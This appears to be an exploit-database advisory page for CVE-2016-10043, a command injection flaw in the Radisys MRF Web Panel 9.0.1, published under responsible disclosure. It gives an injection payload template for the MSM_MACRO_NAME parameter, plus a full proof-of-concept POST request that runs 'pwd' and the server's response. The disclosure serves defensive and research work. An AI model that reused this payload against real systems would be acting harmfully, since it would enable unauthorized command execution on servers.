MRF Web Panel OS Command Injection

vendor:

MRF Web Panel (SWMS)

by:

Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos

CVSS

CRITICAL

OS Command Injection

CWE

Product Name: MRF Web Panel (SWMS)

Affected Version From: 9.0.1

Affected Version To: 9.0.1

Patch Exists: NO

Related CWE: CVE-2016-10043

CPE: a:radisys:mrf_web_panel:9.0.1

Metasploit:

Other Scripts:

Platforms Tested:

2016

MRF Web Panel OS Command Injection

The MRF Web Panel (SWMS) is vulnerable to OS Command Injection attacks. The vulnerability allows an attacker to inject arbitrary OS commands and retrieve the output in the application's responses.

Mitigation:

Apply the vendor-provided patch or update to a non-vulnerable version.

Source

Exploit-DB raw data:

Title:      MRF Web Panel OS Command Injection
Vendor:     Radisys
Vendor Homepage: http://www.radisys.com
Product:    MRF Web Panel (SWMS)
Version:    9.0.1
CVE:        CVE-2016-10043
CWE:        CWE-78
Risk Level: High

Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security

-----------------------------------------------------------------------------------------


Vulnerability Details:

The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.

> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration

It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:

MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #


Proof Of Concept:

1. Login to the vulnerable MRF web panel (with a standard user account): 
   https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:

POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute

4. Check the output of the injected command 'pwd' in the response:

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23

/var/opt/swms/www/html


Vulnerability Impact:

Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.


Disclaimer:

The responsible disclosure policy has been followed